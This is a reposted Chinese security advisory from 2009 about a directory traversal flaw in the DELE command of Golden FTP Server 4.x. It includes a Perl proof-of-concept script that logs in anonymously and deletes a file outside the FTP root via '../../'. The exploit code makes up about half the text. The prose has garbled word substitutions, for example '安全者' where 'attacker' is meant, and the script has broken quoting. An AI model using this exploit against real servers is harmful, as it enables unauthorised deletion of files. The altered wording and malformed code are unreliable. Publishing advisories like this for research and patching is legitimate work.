Golden FTP Server "DELE"命令目录遍历漏洞
来源:岁月联盟
时间:2009-12-06
Golden FTP Server 4.x漏洞描述:
Golden FTP Server是一款流行的FTP服务程序。Golden FTP Server不正确处理'DELE'命令,远程安全者可以利用漏洞进行目录遍历安全删除系统文件。由于没有对"../"字符进行正确的过滤,安全者可以绕过FTP ROOT限制,通过符号链接安全者删除系统上任意文件内容。<*参考
http://packetstormsecurity.org/0912-exploits/goldenftp-delete.txt*>测试方法:
本站提供程序(方法)可能带有安全性,仅供安全研究与教学之用,风险自负!
# Exploit Title: [Golden FTP Server File Deletion Vulnerability]# Date: [18.11.2009]# Author: [sharpe]# Software Link: [http://www.goldenftpserver.com/download.html]# Version: [4.30 Free and Professional]# Tested on: [Windows XP SP3]# CVE : [if exists]# Code : [http://blog.sat0ri.com/?p=292]#---#sat0ri - sudden enlightenment#http://blog.sat0ri.com/use strict;use Net::FTPmy $ftp = Net::FTP->new(”192.168.1.35″, Debug => 1) || die $@;$ftp->login(”anonymous”, ‘anonymous@local.host’) || die $ftp->message;# The FTP root is, via the configuration, set to C:/ftp/public$ftp->cwd(”/public/”) || die $ftp->message;# This deletes the file C:/bollocks.txt$ftp->delete(”../../bollocks.txt”);$ftp->quit;$ftp = undef;安全建议:
目前没有解决方案提供:http://www.goldenftpserver.com/
